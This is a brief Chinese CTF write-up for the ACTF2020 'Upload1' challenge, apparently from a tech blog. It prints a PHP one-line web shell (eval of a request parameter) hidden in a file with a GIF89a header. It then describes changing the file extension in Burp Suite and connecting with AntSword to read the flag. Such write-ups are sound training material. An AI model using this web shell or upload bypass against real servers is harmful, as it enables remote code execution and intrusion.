技术栈

[ACTF2020 新生赛]Upload1

不拿flag不改名2024-09-12 13:20

1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马

GIF89a? <script language="php">eval($_REQUEST[1])</script>

2、使用bp抓包修改后缀,点击发送

3、不关浏览器的代理,在bp中将该包放行

4、用蚁剑连接

5、在根目录中找到flag

上一篇:Ansible Tower与AWX:构建可视化的运维自动化解决方案
下一篇:鸿蒙开发(API 12 Beta6版)【通用属性协议】 网络篇
相关推荐
砖厂小工
6 小时前
用 GLM + OpenClaw 打造你的 AI PR Review Agent — 让龙虾帮你审代码
android·github
张拭心
7 小时前
春节后,有些公司明确要求 AI 经验了
android·前端·人工智能
张拭心
7 小时前
Android 17 来了!新特性介绍与适配建议
android·前端
Kapaseker
9 小时前
Compose 进阶—巧用 GraphicsLayer
android·kotlin
黄林晴
10 小时前
Android17 为什么重写 MessageQueue
android
阿巴斯甜
1 天前
Android 报错:Zip file '/Users/lyy/develop/repoAndroidLapp/l-app-android-ble/app/bu
android
Kapaseker
1 天前
实战 Compose 中的 IntrinsicSize
android·kotlin
xq9527
1 天前
Andorid Google 登录接入文档
android
黄林晴
1 天前
告别 Modifier 地狱,Compose 样式系统要变天了
android·android jetpack
冬奇Lab
2 天前
Android触摸事件分发、手势识别与输入优化实战
android·源码阅读
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤06OpenClaw优化飞书API 额度已耗尽问题07【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆08小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)09Window 10部署openclaw报错node.exe : npm error code 12810OpenClaw大龙虾机器人完整安装教程